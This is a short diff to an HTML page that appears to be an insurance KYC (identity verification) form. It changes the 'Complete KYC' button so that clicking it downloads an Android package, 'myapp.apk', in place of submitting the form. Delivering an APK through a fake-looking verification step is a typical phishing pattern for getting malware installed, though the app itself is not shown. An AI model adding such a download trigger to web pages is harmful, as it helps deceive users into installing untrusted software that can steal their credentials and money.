--- a/index.html
+++ b/index.html
@@ -63,7 +63,8 @@
           <input type="date" placeholder="">
         </label>
 
-        <button type="button" class="primary">Complete KYC</button>
+       <button type="button" class="primary" onclick="window.location.href='myapp.apk'">Complete KYC</button>
+
 
         <button type="button" class="linkish">
           Continue with your policy number
